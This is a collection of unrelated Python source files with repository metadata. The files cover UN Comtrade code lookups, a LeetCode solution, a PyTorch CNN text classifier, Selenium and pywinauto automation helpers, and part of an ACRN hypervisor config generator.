def find_country_code(country, reporter_or_partner):
"""
tries to find the country code corresponding to a country name
procedure: try to find exact match, if not look for partial matches
input country: country name or part of country name (case-sensitive!)
input reporter_or_partner: 'reporter' or 'partner'
output: country code
"""
# we use a local copy of the file with country codes so that we do not have to use
# https://comtrade.un.org/data/cache/reporterAreas.json every time
if not os.path.exists(reporter_or_partner + 'Areas.csv'):
download_country_codes_file(reporter_or_partner)
df = pd.read_csv(reporter_or_partner + 'Areas.csv', encoding='latin_1', index_col=0)
# look for an exact match
mask = (df.text == country)
if sum(mask) == 1:
code = df.index[mask].tolist()[0]
return code
# look for a partial match
# this might be useful because some 'official' names of countries are not always that well-known
# e.g. 'Bolivia (Plurinational State of)' instead of Bolivia'
mask2 = (df.text.str.contains(country))
if sum(mask2) > 0:
print('There is no country in the json-file with the exact name "{}". '.format(country) + \
'The following countries contain the word "{}". '.format(country) + \
'If you think that one of the following countries is the one that you are looking for, press "y".')
dict_matches = df[mask2].text.to_dict()
for code, country in dict_matches.items():
response = input('{} {} [y?] '.format(code, country))
if response == 'y':
return code
# if no code could be found:
raise LookupError('It was not possible to find a code that corresponds to the country {}.'.format(country))
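# Illustrative usage (added note; codes come from the cached *Areas.csv files):
# an exact match such as find_reporter_code('USA') is expected to return 842,
# the same reporter code used as the default in download_trade_data_base above;
# partial matches fall back to the interactive confirmation prompt.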
def download_country_codes_file(reporter_or_partner):
"""
downloads either the reporter or the partner file and saves it in the current directory
input: 'reporter' or 'partner'
"""
url = 'https://comtrade.un.org/data/cache/{}Areas.json'.format(reporter_or_partner)
json_dict = requests.get(url).json()
df = pd.DataFrame.from_dict(json_dict['results'])
df = df.set_index('id')
df.drop('all', inplace=True)
df.to_csv('{}Areas.csv'.format(reporter_or_partner))
def dict_item_to_string(key, value):
"""
inputs: key-value pairs from a dictionary
output: string 'key=value' or 'key=value1,value2' (if value is a list)
examples: 'fmt', 'csv' => 'fmt=csv' or 'r', [124, 484] => 'r=124,484'
"""
value_string = str(value) if not isinstance(value, list) else ','.join(map(str, value))
return '='.join([key, value_string])
def dict_to_string(parameters):
"""
input: dictionary of parameters
output: string 'key1=value1&key2=value2&...'
"""
return '&'.join(dict_item_to_string(key, value) for key, value in parameters.items())
###############################################################################
def product_codes_with_parent(parent_code):
"""
Returns a python dictionary with all entries that belong to parent_code.
"""
if not os.path.exists('classificationHS.csv'):
download_product_codes_file()
df = load_product_codes_file()
mask = df.parent == parent_code
return df.text[mask].to_dict()
def search_product_code(pat, case=True, flags=0, regex=True, n_digits=None):
"""
Returns a python dictionary with all entries that contain the pattern pat and have a code with length n_digits.
If n_digits = None (default), we do not care about how many digits the classification code has.
For searching for the pattern pat, we use pd.Series.str.contains which takes the following parameters:
pat : string
Character sequence or regular expression
case : boolean, default True
If True, case sensitive
flags : int, default 0 (no flags)
re module flags, e.g. re.IGNORECASE
regex : bool, default True
If True use re.search, otherwise use Python in operator
"""
if not os.path.exists('classificationHS.csv'):
download_product_codes_file()
df = load_product_codes_file()
if n_digits is not None:
mask1 = df.text.str.contains(pat, case=case, flags=flags, regex=regex)
mask2 = df.index.to_series().apply(lambda digit: len(digit) == n_digits)
mask = mask1 & mask2
else: mask = df.text.str.contains(pat, case=case, flags=flags, regex=regex)
return df.text[mask].to_dict()
def load_product_codes_file():
"""
Loads the product codes file as a pandas dataframe.
"""
df = pd.read_csv('classificationHS.csv', encoding='latin-1', index_col='id')
return df
def download_product_codes_file():
"""
Downloads the product codes files and saves it in the current directory.
The short-cut entries for 'ALL', 'TOTAL', 'AG2', 'AG4' and 'AG6' are deleted.
"""
url = 'https://comtrade.un.org/data/cache/classificationHS.json'
json_dict = requests.get(url).json()
df = pd.DataFrame.from_dict(json_dict['results'])
df = df.set_index('id')
df.drop(['ALL', 'TOTAL', 'AG2', 'AG4', 'AG6'], inplace=True)
df.text = df.text.apply(lambda x: ' - '.join(x.split(' - ')[1:])) # remove digits from beginning of text
df.to_csv('classificationHS.csv')
``` |
{
"source": "johnxferraro/data-structures-and-algorithms",
"score": 3
} |
#### File: javascript/code-challenges/MinCostClimbingStairs.py
```python
class Solution(object):
def minCostClimbingStairs(self, cost):
"""
:type cost: List[int]
:rtype: int
"""
cost.append(0)
# iterate backwards, starting on the length of cost minus 3, going back -1 each time until hitting -1.
# in the case of [10, 15, 20] 0
for i in range(len(cost) - 3, -1, -1):
# whichever one is smaller (15 + 20 or 15 + 0 for the first case)
cost[i] += min(cost[i + 1], cost[i + 2])
return min(cost[0], cost[1])
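# Worked example (added for clarity, LeetCode 746): cost = [10, 15, 20]
#   append 0                -> [10, 15, 20, 0]
#   i = 1: 15 + min(20, 0)  -> [10, 15, 20, 0]
#   i = 0: 10 + min(15, 20) -> [25, 15, 20, 0]
#   answer: min(25, 15) = 15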
``` |
{
"source": "johnxguo/test",
"score": 3
} |
#### File: test/misc/test.py
```python
import os
import time
from colorama import Fore, Back, Style, init
import asyncio
def asyncrun(future):
return asyncio.get_event_loop().run_until_complete(future)
async def fa(num):
a = 1 / num
async def downloadPath(path):
tasks = [
asyncio.ensure_future(fa(1)),
asyncio.ensure_future(fa(0))
]
try:
a = await asyncio.wait(tasks)
a = await fa(0)
except Exception as err:
print(err)
a = asyncrun(downloadPath(1))
``` |
{
"source": "Johnxjp/cnn_text_classification",
"score": 3
} |
#### File: Johnxjp/cnn_text_classification/cnn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from softmax import Softmax
class YKCNNClassifier(nn.Module):
def __init__(
self,
vocabulary_size,
max_seq_length,
output_dims=2,
out_channels=100,
embed_dim=300,
padding_idx=0,
kernel_heights=[3, 4, 5],
hidden_dims=[],
fc_dropout=0,
embedding_matrix=None,
freeze_embedding_layer=True,
):
super().__init__()
self.out_channels = out_channels
self.in_channels = 1
self.n_kernels = len(kernel_heights)
self.pool_sizes = [(max_seq_length - K, 1) for K in kernel_heights]
self.max_seq_length = max_seq_length
self.hidden_dims = hidden_dims
self.output_dims = output_dims
# Assumes vocab size is same as embedding matrix size. Therefore should
# contain special tokens e.g. <pad>
self.embedding = nn.Embedding(
vocabulary_size, embed_dim, padding_idx=padding_idx
)
if embedding_matrix is not None:
# Load pre-trained weights. Should be torch FloatTensor.
# nn.Embedding.from_pretrained is a classmethod that returns a new module,
# so reassign; freeze=False leaves freezing to freeze_embedding_layer below.
self.embedding = nn.Embedding.from_pretrained(
embedding_matrix, padding_idx=padding_idx, freeze=False
)
if freeze_embedding_layer:
self.embedding.weight.requires_grad = False
self.convs = nn.ModuleList(
[
nn.Conv2d(
self.in_channels,
self.out_channels,
kernel_size=(K, embed_dim),
)
for K in kernel_heights
]
)
self.pools = nn.ModuleList(
[
nn.MaxPool2d(kernel_size=pool_size)
for pool_size in self.pool_sizes
]
)
self.fc = Softmax(
input_dim=self.out_channels * self.n_kernels,
hidden_dims=self.hidden_dims,
output_dim=self.output_dims,
dropout=fc_dropout,
)
def forward(self, x):
"""
x: (batch_size, max_sequence_length)
"""
batch_size = x.size(0)
assert x.size(1) == self.max_seq_length
# (batch, max_sequenece_length, embedding_dim)
x = self.embedding(x)
# adds input channel
# (batch, 1, max_sequence_length, embedding_dim)
x = x.unsqueeze(dim=1)
out_tensors = []
for (conv, pool) in zip(self.convs, self.pools):
activation = pool(F.relu(conv(x)))
out_tensors.append(activation)
# Output from conv and pooling operation will be of size
# (batch_size, out * n_kernels, 1, 1)
x = torch.cat(out_tensors, dim=1)
# Reshape to pass into fully connected
x = x.view(batch_size, -1)
return self.fc(x)
def predict(self, x):
with torch.no_grad():
return F.softmax(self.forward(x), dim=1)
def predict_classes(self, x):
predictions = self.predict(x)
return torch.argmax(predictions, dim=1)
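# Minimal smoke-test sketch (not part of the original file; assumes the local
# `softmax.Softmax` module imported above accepts the constructor arguments
# used in __init__):
if __name__ == "__main__":
    model = YKCNNClassifier(vocabulary_size=1000, max_seq_length=50)
    dummy_batch = torch.randint(0, 1000, (4, 50))  # (batch_size, max_seq_length)
    logits = model(dummy_batch)                     # expected shape: (4, output_dims)
    print(logits.shape, model.predict_classes(dummy_batch))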
``` |
{
"source": "johnxthekid/AutomationFramework",
"score": 2
} |
#### File: browsers/drivermanagers/BrowserManager.py
```python
import sys
from os import path
sys.path.append(path.join(path.dirname(__file__), "..", "..", ".."))
import uuid
from robot.api import logger
from selenium.webdriver.chrome.options import Options
from lib.browsers.drivermanagers.ChromeManager import ChromeManager
from lib.browsers.drivermanagers.EdgeManager import EdgeManager
from lib.browsers.drivermanagers.FirefoxManager import FirefoxManager
chrome = "chrome"
edge = "edge"
firefox = "firefox"
class BrowserSetup:
_driver = None
@classmethod
def _init_browser(cls, browser_type, driver_location=None, new_options=None):
browser_list = {chrome: ChromeManager, edge: EdgeManager, firefox: FirefoxManager}
# if cls._driver is None:
_browser = browser_list.get(browser_type, None)
if _browser is None:
raise AttributeError(f"incorrect browser type provide: {browser_type}")
return _browser(driver_location, new_options).open_browser()
# return cls._driver
class BrowserManager:
__BROWSER_INSTANCES = {}
def __init__(self):
logger.info("Browser Manager set")
@staticmethod
def open_browser(browser=None, driver_location=None, new_options=None):
if browser is None:
raise AttributeError(f"Please specify one of the following browsers to initialize: \n{chrome, edge, firefox}")
else:
return BrowserManager.set_browser_instance(browser, driver_location, new_options)
@staticmethod
def set_browser_instance(browser, driver_location=None, new_options=None):
browser_instance = BrowserSetup._init_browser(browser, driver_location, new_options=new_options)
browser_id = str(uuid.uuid1())
BrowserManager.__BROWSER_INSTANCES.update({browser_id: browser_instance})
return browser_id, browser_instance
@staticmethod
def delele_browser_instance(browser_id):
del BrowserManager.__BROWSER_INSTANCES[browser_id]
@staticmethod
def get_browser_instance(browser_id):
logger.info(f"brower id: {browser_id}")
logger.debug(f"browser list: {BrowserManager.__BROWSER_INSTANCES}")
browser = BrowserManager.__BROWSER_INSTANCES.get(browser_id, None)
logger.info(f"Browser instance: {browser}")
return browser
def open_page(self, browser_id, url):
browser = self.get_browser_instance(browser_id)
browser.get(url)
def close_browser(self, browser_id=None):
browser = self.get_browser_instance(browser_id)
browser.quit()
self.delele_browser_instance(browser_id)
def get_page_title(self, browser_id):
browser = self.get_browser_instance(browser_id)
return browser.title
```
#### File: browsers/pageobjectmodels/DemoMainPage.py
```python
import sys
from os import path
sys.path.append(path.join(path.dirname(__file__), "..", "..", ".."))
from robot.api import logger
from lib.browsers.drivermanagers.BrowserManager import BrowserManager
from lib.browsers.drivermanagers.BrowserElementActions import ElementActions
from config.browserproperties.demopage_properties import *
class DemoMainPage:
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
_browser_manager = None
def __init__(self, driver):
self.element = ElementActions(driver)
# @staticmethod
# def open_browser(browser):
# browser_id = BrowserManager.open_browser(browser)
# return browser_id
def select_departure_city(self, browser_id, city):
# driver = self._browser_manager.get_browser_instance(browser_id)
departure_city_field = self.element.get(departure_city)
departure_city_field.select.select_by_value(city)
def select_destination_city(self, browser_id, city):
# driver = self._browser_manager.get_browser_instance(browser_id)
destination_city_field = self.element.get(destination_city)
destination_city_field.select.select_by_value(city)
def search_for_flights(self, browser_id):
# driver = self._browser_manager.get_browser_instance(browser_id)
self.element.get(search_flight_button).click()
def get_flight_results(self, browser_id):
# driver = self._browser_manager.get_browser_instance(browser_id)
flights = self.element.get(flight_result_table, many=True)
return [flight.text for flight in flights.element]
# def open_page(self, browser_id, url):
# driver = self._browser_manager.get_browser_instance(browser_id)
# driver.get(url)
# def get_page_title(self, browser_id):
# driver = self._browser_manager.get_browser_instance(browser_id)
# return driver.title
# def close_browser(self, browser_id):
# driver = self._browser_manager.get_browser_instance(browser_id)
# driver.close()
# self._browser_manager.delele_browser_instance(browser_id)
if __name__ == '__main__':
# pass
bm = BrowserManager()
browser_id, driver = bm.open_browser('chrome')
driver.get("http://blazedemo.com/")
print(bm.get_page_title(browser_id=browser_id))
demo = DemoMainPage(driver=driver)
demo.select_departure_city(browser_id, 'Paris')
demo.select_destination_city(browser_id, 'London')
demo.search_for_flights(browser_id)
print(demo.get_flight_results(browser_id))
bm.close_browser(browser_id)
```
#### File: frontend/appmanagers/WinAppManager.py
```python
from os import environ
from sys import path
from pywinauto.application import Application
from pywinauto import Desktop
from pywinauto.timings import wait_until, TimeoutError
from pywinauto.findwindows import ElementNotFoundError, find_windows, WindowNotFoundError
from retrying import retry
from tempfile import NamedTemporaryFile
import uuid
import logging
log = logging.getLogger(__name__)
class WinAppManager:
UIA = "uia"
WIN32 = "win32"
EXISTING_APP_PROCESS = []
APP_INSTANCES = {}
def __init__(self, app_type="uia"):
'''
Class to initialized the main application for automation
:param app_type: the backend type for the application UIA or WIN32
'''
self.app = Application(backend=app_type)
self.desktop_app = Desktop(backend=app_type)
def open_app(self, app_location, app_name=None, timeout=None, retry_value=None):
"""
Opens the application to be tested
:param app_location: Location of the application to automate
:param app_name: Window text property name of the application
:param timeout: time out value before retrying to launch the application
:param retry_value: number of retries to launch the application
:return: the app_id of the started application instance
"""
log.info("Starting application")
self.app.start(cmd_line=app_location, timeout=timeout, retry_interval=retry_value)
log.debug("retrieving the Application dialog")
try:
app_dlg = self.app.top_window()
app_process = self.app.process
except RuntimeError:
if app_name is not None:
log.debug("No windows found through Application. Using Desktop instead")
app_dlg = self.desktop_app[app_name]
app_process = app_dlg.element_info.process_id
else:
raise RuntimeError("No windows found through Application, Provide an app_name to connect via Desktop backend class")
app_dlg.wait('visible', timeout)
for counter in range(5):
if app_process in self.__class__.EXISTING_APP_PROCESS:
if counter == 4:
raise ElementNotFoundError("Could not get the correct Application Process")
else:
log.info(f"New application process started successfully. Process ID {self.app.process}")
break
app_id = str(uuid.uuid1())
self.__class__.EXISTING_APP_PROCESS.append(app_process)
self.APP_INSTANCES.update({app_id: app_dlg})
print(self.__class__.EXISTING_APP_PROCESS)
return app_id
@classmethod
def get_app_instance(cls, app_id):
return cls.APP_INSTANCES.get(app_id, None)
@classmethod
def delete_app_instance(cls, app_id):
del cls.APP_INSTANCES[app_id]
@retry(stop_max_attempt_number=3)
def connect_to_app(self, app_location):
'''
function that returns the instance of the Application being automated
:param app_location: location of the application to automate
:return: instance of the application under test
'''
return self.app.connect(path=app_location).top_window()
def list_desktop_windows(self):
"""
Displays list of top level windows active on the desktop
:return: Name of desktop windows
"""
return [app_window._element_info.name for app_window in self.desktop_app.windows(visible_only=True, enabled_only=True)]
@staticmethod
def get_window_dialog(app_type, handle_id):
"""
returns the window dialog for handle ID provided
:param app_type: the backend type for the application UIA or WIN32
:param handle_id: the handle ID of the application
:return: returns the dialog object for the window
"""
return Application(backend=app_type).connect(handle=handle_id).window(handle=handle_id)
def get_window_title(self, dialog_instance=None):
return self.app.top_window().window_text() if dialog_instance is None else dialog_instance.window_text()
def get_app_display_state(self):
"""
:return: the display state of the application
"""
pass
def list_dialog_children(self):
"""
:return: list of children from the dialog window
"""
return [child.window_text() for child in self.app.top_window().children()]
def list_dialog_child_windows(self, dialog_instance):
"""
List the child windows as an object
:return: Object list of child windows
"""
# todo: Finish this method to return the correct list of child windows
main_lst = NamedTemporaryFile()
# main_lst.write()
main_lst.close()
dialog_instance.print_control_identifiers(filename=main_lst.name)
child_list2 = []
final_lst = {}
with open(main_lst.name, 'r') as main_child:
child_list = [line for line in main_child if 'child_window' in line]
child_level = child_list.count('|')
for n_window in child_list:
child_list2.append(n_window[n_window.find('(') + 1: n_window.find(')') - 1])
for index, n_window2 in enumerate(child_list2):
_a = n_window2.split(',')
for _b in _a:
_c = _b.split('=')
final_lst.update({f'child{index}': {_c[0]: _c[1]}})
return final_lst
@staticmethod
def list_dialog_menu(dialog_instance):
"""
List the top level menus for the current window dialog
:param dialog_instance: dialog instance for the current window
:return:
"""
return [menu['text'] for menu in dialog_instance.menu_items()]
def list_dialog_menu_submenu(self, dialog_instance, menu_name):
"""
List the sub menus for the current window dialog
:param dialog_instance: dialog instance for the current window
:param menu_name: Top level menu name
:return:
"""
top_menus = self.__class__.list_dialog_menu(dialog_instance)
if menu_name in top_menus:
return [subs['text'] for subs in dialog_instance.menu_items()[top_menus.index(menu_name)]['menu_items']['menu_items']]
else:
raise ElementNotFoundError(f"{menu_name} does not exist in the current list of menus below:\n{top_menus}")
def get_clean_menus(self, menu_list):
"""
removes the special characters from the menu name
:param menu_list: List of menus
:return:
"""
temp_m = [m_clean.replace("&", "") for m_clean in menu_list]
sub_menu_clean = [sub_value.split("\t")[0] for sub_value in temp_m]
return sub_menu_clean
def remove_app_process(self, app_process_id):
"""
Removes the specified application instance
:param app_process_id: process id of the application instance to be removed
:return:
"""
pass
def get_new_window_dialog(self):
"""
Returns the dialog of the application being automated
:return: Dialog object of the new page in the application
"""
# todo: add a new method that provides the name of the new dialog
return self.app[self.app.top_window().window_text()]
@staticmethod
def get_app_handle(app_instance):
"""
returns the handle id for the application instance being automated
:param app_instance: the instance that is being automated
:return: handle_id of the application
"""
return app_instance.wrapper_object().handle
@staticmethod
def get_app_process(dialog_instance):
"""
returns the process id for the application instance being automated
:param dialog_instance: the instance of the dialog for the application
:return: process_id of the application
"""
log.info("Retrieving the application process id")
return dialog_instance.wrapper_object().process_id()
@classmethod
def get_app_handle_list(cls, app_instance=None, process_id=None):
"""
returns the list of handles found for the application instance
:param app_instance: the instance of the application running
:param process_id: the process id of the application
:return: the list of handles found
"""
if app_instance is not None:
handles = find_windows(process=cls.get_app_process(app_instance))
elif process_id is not None:
handles = find_windows(process=process_id)
else:
return AttributeError("application instance or process requires to retrieve the correct handles list")
return handles
def close_app_instance(self, app_id):
"""draw_outline("red")
closes the instance of the application provided
:param app_instance: the instance of the application running
:return: True if the application was closed successfully
"""
app_instance = cls.APP_INSTANCES.get(app_id, None)
if app_instance is None:
app_instance = self.app.top_window()
# todo: Need to remove app process from the process list
try:
if app_instance.is_visible():
app_instance.close()
else:
log.debug("Application Window was not found. Already closed")
except ElementNotFoundError:
log.debug("Application Window was not found. Already closed")
return True
if __name__ == '__main__':
app_auto = WinAppManager(WinAppManager.WIN32)
main_dlg = app_auto.open_app('Notepad.exe')
'''Each menu in Notepad is a different window'''
main_window_name = main_dlg.window_text()
print(f"now on main window: {main_window_name}")
main_dlg.menu_select("Edit -> Replace")
# main_dlg.menu_select("Format -> Font")
'''New window open with name Replace'''
# menu_window_name = app_obj.top_window().window_text()
menu_window_dlg = app_auto.get_new_window_dialog()
# app_obj[menu_window_name].Cancel.click()
print(f"now on Menu window: {menu_window_dlg.window_text()}")
menu_window_dlg.Cancel.click()
main_dlg.Edit.type_keys(f"Hi from Python interactive prompt {dir()}", with_spaces=True)
'''Get list of menu options for the application'''
# menu_names = [menu['text'] for menu in main_dlg.menu_items()]
menu_names = app_auto.list_dialog_menu(main_dlg)
print(f'Menu names: \n{menu_names}')
print(f'clean Menu: \n{app_auto.get_clean_menus(menu_names)}')
sub_menu = app_auto.list_dialog_menu_submenu(main_dlg, menu_names[0])
print(f'Submenu for {menu_names[0]}:\n{sub_menu}')
print(f'Clean Submenu: \n{app_auto.get_clean_menus(sub_menu)}')
main_dlg.menu_select("File -> Exit")
'''New window open with name Notepad'''
# file_window_name = app_obj.top_window().window_text()
file_window_dlg = app_auto.get_new_window_dialog()
print(f"now on file window: {file_window_dlg.window_text()}")
# app_obj[file_window_name].DontSave.click()
file_window_dlg.DontSave.click()
```
#### File: lib/utils/AllKeywordsLibrary.py
```python
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from robot.api import logger
from lib.browsers.drivermanagers.BrowserManager import BrowserManager
from lib.frontend.apphelpers.SampleNotepadHelper import SampleNotepadHelper
from lib.browsers.pageobjectmodels.DemoMainPage import DemoMainPage
from lib.browsers.pageobjectmodels.sofi.sofi_login import SofiLoginPage
class AllKeywordsLibrary(DemoMainPage, SampleNotepadHelper, SofiLoginPage):
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
_browser_manager = None
_browser = None
_browser_id = None
_driver = None
def __init__(self, run_location):
logger.info(f"Running keyword library: {run_location}")
self._browser_manager = BrowserManager()
SampleNotepadHelper.__init__(self)
def open_browser(self, browser_type, driver_location=None, options=None):
self._browser_id, self.driver = BrowserManager.open_browser(browser_type, driver_location, options)
self._browser = BrowserManager.get_browser_instance(self._browser_id)
DemoMainPage.__init__(self, self.driver)
SofiLoginPage.__init__(self, self.driver)
def open_page(self, url):
self.driver.get(url)
def get_page_title(self):
return self._browser_manager.get_page_title()
def close_browser(self):
self._browser_manager.close_browser(self._browser_id)
``` |
{
"source": "johnxwu/my-acrn",
"score": 2
} |
#### File: acrn-config/board_config/misc_cfg_h.py
```python
import common
import board_cfg_lib
import scenario_cfg_lib
MISC_CFG_HEADER = """#ifndef MISC_CFG_H
#define MISC_CFG_H"""
MISC_CFG_END = """#endif /* MISC_CFG_H */"""
class Vuart:
t_vm_id = {}
t_vuart_id = {}
v_type = {}
v_base = {}
v_irq = {}
def sos_bootarg_diff(sos_cmdlines, config):
if sos_cmdlines:
sos_len = len(sos_cmdlines)
i = 0
for sos_cmdline in sos_cmdlines:
if not sos_cmdline:
continue
i += 1
if i == 1:
if sos_len == 1:
print('#define SOS_BOOTARGS_DIFF\t"{}"'.format(sos_cmdline.strip('"')), file=config)
else:
print('#define SOS_BOOTARGS_DIFF\t"{} " \\'.format(sos_cmdline), file=config)
else:
if i < sos_len:
print('\t\t\t\t"{} "\t\\'.format(sos_cmdline), file=config)
else:
print('\t\t\t\t"{}"'.format(sos_cmdline), file=config)
def parse_boot_info():
err_dic = {}
if 'SOS_VM' in common.VM_TYPES.values():
sos_cmdlines = list(common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "board_private", "bootargs").values())
sos_rootfs = list(common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "board_private", "rootfs").values())
(err_dic, vuart0_dic, vuart1_dic) = scenario_cfg_lib.get_sos_vuart_settings(launch_flag=False)
else:
sos_cmdlines = list(common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "os_config", "bootargs").values())
sos_rootfs = list(common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "os_config", "rootfs").values())
(err_dic, vuart0_dic, vuart1_dic) = scenario_cfg_lib.get_sos_vuart_settings(launch_flag=False)
return (err_dic, sos_cmdlines, sos_rootfs, vuart0_dic, vuart1_dic)
def clos_per_vm_gen(config):
clos_per_vm = {}
clos_per_vm = common.get_leaf_tag_map(
common.SCENARIO_INFO_FILE, "clos", "vcpu_clos")
for i,clos_list_i in clos_per_vm.items():
clos_config = scenario_cfg_lib.clos_assignment(clos_per_vm, i)
print("#define VM{0}_VCPU_CLOS\t\t\t{1}".format(i, clos_config['clos_map']), file=config)
def cpu_affinity_output(cpu_bits, i, config):
if "SOS_VM" == common.VM_TYPES[i]:
print("", file=config)
print("#define SOS_VM_CONFIG_CPU_AFFINITY\t{0}".format(
cpu_bits['cpu_map']), file=config)
else:
print("#define VM{0}_CONFIG_CPU_AFFINITY\t{1}".format(
i, cpu_bits['cpu_map']), file=config)
def cpu_affinity_per_vm_gen(config):
cpus_per_vm = common.get_leaf_tag_map(
common.SCENARIO_INFO_FILE, "cpu_affinity", "pcpu_id")
for vm_i,_ in common.VM_TYPES.items():
cpu_bits = scenario_cfg_lib.cpus_assignment(cpus_per_vm, vm_i)
cpu_affinity_output(cpu_bits, vm_i, config)
print("", file=config)
def pci_dev_num_per_vm_gen(config):
pci_items = common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "pci_devs", "pci_dev")
pci_devs = scenario_cfg_lib.get_pci_devs(pci_items)
pci_dev_num = scenario_cfg_lib.get_pci_num(pci_devs)
ivshmem_region = common.get_hv_item_tag(common.SCENARIO_INFO_FILE,
"FEATURES", "IVSHMEM", "IVSHMEM_REGION")
shmem_enabled = common.get_hv_item_tag(common.SCENARIO_INFO_FILE,
"FEATURES", "IVSHMEM", "IVSHMEM_ENABLED")
shmem_regions = scenario_cfg_lib.get_shmem_regions(ivshmem_region)
shmem_num = scenario_cfg_lib.get_shmem_num(shmem_regions)
for vm_i,vm_type in common.VM_TYPES.items():
if "POST_LAUNCHED_VM" == scenario_cfg_lib.VM_DB[vm_type]['load_type']:
if shmem_enabled == 'y' and vm_i in shmem_num.keys():
print("#define VM{}_CONFIG_PCI_DEV_NUM\t{}U".format(vm_i, shmem_num[vm_i]), file=config)
elif "PRE_LAUNCHED_VM" == scenario_cfg_lib.VM_DB[vm_type]['load_type']:
shmem_num_i = 0
if shmem_enabled == 'y' and vm_i in shmem_num.keys():
shmem_num_i = shmem_num[vm_i]
print("#define VM{}_CONFIG_PCI_DEV_NUM\t{}U".format(vm_i, pci_dev_num[vm_i] + shmem_num_i), file=config)
print("", file=config)
def split_cmdline(cmd_str, config):
cmd_list = [i for i in cmd_str.strip('"').split()]
if not cmd_list: return
last_idx = len(cmd_list) - 1
for idx, cmd_arg in enumerate(cmd_list):
if idx == 0:
print('"', end="", file=config)
elif idx % 4 == 0:
print("\\\n", end="", file=config)
if idx == last_idx:
print('{}"'.format(cmd_arg), file=config)
else:
print('{} '.format(cmd_arg), end="", file=config)
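# Illustrative behaviour (hypothetical bootargs, not from the original source):
#   split_cmdline('"root=/dev/sda rw console=ttyS0 quiet loglevel=3"', config)
# writes the arguments as a quoted C string, breaking the line after every
# four arguments:
#   "root=/dev/sda rw console=ttyS0 quiet \
#   loglevel=3"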
def boot_args_per_vm_gen(config):
kern_args = common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "os_config", "bootargs")
for vm_i,vm_type in common.VM_TYPES.items():
if "PRE_LAUNCHED_VM" == scenario_cfg_lib.VM_DB[vm_type]['load_type']:
if vm_i in kern_args.keys() and kern_args[vm_i]:
print("#define VM{}_BOOT_ARGS\t".format(vm_i), end="", file=config)
split_cmdline(kern_args[vm_i].strip(), config)
print("", file=config)
print("", file=config)
def pt_intx_num_vm0_gen(config):
phys_gsi, virt_gsi = common.get_pt_intx_table(common.SCENARIO_INFO_FILE)
if (board_cfg_lib.is_matched_board(("ehl-crb-b"))
and phys_gsi.get(0) is not None
and len(phys_gsi[0]) > 0):
print("#define VM0_PT_INTX_NUM\t{}U".format(len(phys_gsi[0])), file=config)
else:
print("#define VM0_PT_INTX_NUM\t0U", file=config)
print("", file=config)
def generate_file(config):
"""
Start to generate board.c
:param config: it is a file pointer of board information for writing to
"""
board_cfg_lib.get_valid_irq(common.BOARD_INFO_FILE)
# get the vuart0/vuart1 which the user chose from the board_private section of scenario.xml
(err_dic, ttys_n) = board_cfg_lib.parser_hv_console()
if err_dic:
return err_dic
# parse sos_bootargs/rootfs/console
(err_dic, sos_cmdlines, sos_rootfs, vuart0_dic, vuart1_dic) = parse_boot_info()
if err_dic:
return err_dic
if vuart0_dic:
# parse to get port base/irq of vuart0/vuart1
vuart0_port_base = board_cfg_lib.LEGACY_TTYS[list(vuart0_dic.keys())[0]]
vuart0_irq = vuart0_dic[list(vuart0_dic.keys())[0]]
vuart1_port_base = board_cfg_lib.LEGACY_TTYS[list(vuart1_dic.keys())[0]]
vuart1_irq = vuart1_dic[list(vuart1_dic.keys())[0]]
# parse the setting ttys vuartx dic: {vmid:base/irq}
vuart0_setting = Vuart()
vuart1_setting = Vuart()
vuart0_setting = common.get_vuart_info_id(common.SCENARIO_INFO_FILE, 0)
vuart1_setting = common.get_vuart_info_id(common.SCENARIO_INFO_FILE, 1)
# sos command lines information
sos_cmdlines = [i for i in sos_cmdlines[0].split() if i != '']
# add maxcpus parameter into sos cmdlines if there are pre-launched VMs
pcpu_list = board_cfg_lib.get_processor_info()
cpu_affinity = common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "cpu_affinity", "pcpu_id")
pre_cpu_list = []
sos_cpu_num = 0
for vmid, cpu_list in cpu_affinity.items():
if vmid in common.VM_TYPES and cpu_list != [None]:
vm_type = common.VM_TYPES[vmid]
load_type = ''
if vm_type in scenario_cfg_lib.VM_DB:
load_type = scenario_cfg_lib.VM_DB[vm_type]['load_type']
if load_type == "PRE_LAUNCHED_VM":
pre_cpu_list += cpu_list
elif load_type == "SOS_VM":
sos_cpu_num += len(cpu_list)
if sos_cpu_num == 0:
sos_cpu_num_max = len(list(set(pcpu_list) - set(pre_cpu_list)))
else:
sos_cpu_num_max = sos_cpu_num
if sos_cpu_num_max > 0:
sos_cmdlines.append('maxcpus='+str(sos_cpu_num_max))
# get native rootfs list from board_info.xml
(root_devs, root_dev_num) = board_cfg_lib.get_rootfs(common.BOARD_INFO_FILE)
# start to generate misc_cfg.h
print("{0}".format(board_cfg_lib.HEADER_LICENSE), file=config)
print("{}".format(MISC_CFG_HEADER), file=config)
print("", file=config)
# define rootfs with macro
#for i in range(root_dev_num):
# print('#define ROOTFS_{}\t\t"root={} "'.format(i, root_devs[i]), file=config)
# sos rootfs and console
if "SOS_VM" in common.VM_TYPES.values():
print('#define SOS_ROOTFS\t\t"root={} "'.format(sos_rootfs[0]), file=config)
if ttys_n:
print('#define SOS_CONSOLE\t\t"console={} "'.format(ttys_n), file=config)
else:
print('#define SOS_CONSOLE\t\t" "', file=config)
# sos com base/irq
i_type = 0
for vm_i,vm_type in common.VM_TYPES.items():
if vm_type == "SOS_VM":
i_type = vm_i
break
if "SOS_VM" in common.VM_TYPES.values():
if vuart0_dic:
print("#define SOS_COM1_BASE\t\t{}U".format(vuart0_port_base), file=config)
print("#define SOS_COM1_IRQ\t\t{}U".format(vuart0_irq), file=config)
else:
print("#define SOS_COM1_BASE\t\t0U", file=config)
print("#define SOS_COM1_IRQ\t\t0U", file=config)
if vuart1_setting[i_type]['base'] != "INVALID_COM_BASE":
print("#define SOS_COM2_BASE\t\t{}U".format(vuart1_port_base), file=config)
print("#define SOS_COM2_IRQ\t\t{}U".format(vuart1_irq), file=config)
# sos boot command line
print("", file=config)
if "SOS_VM" in common.VM_TYPES.values():
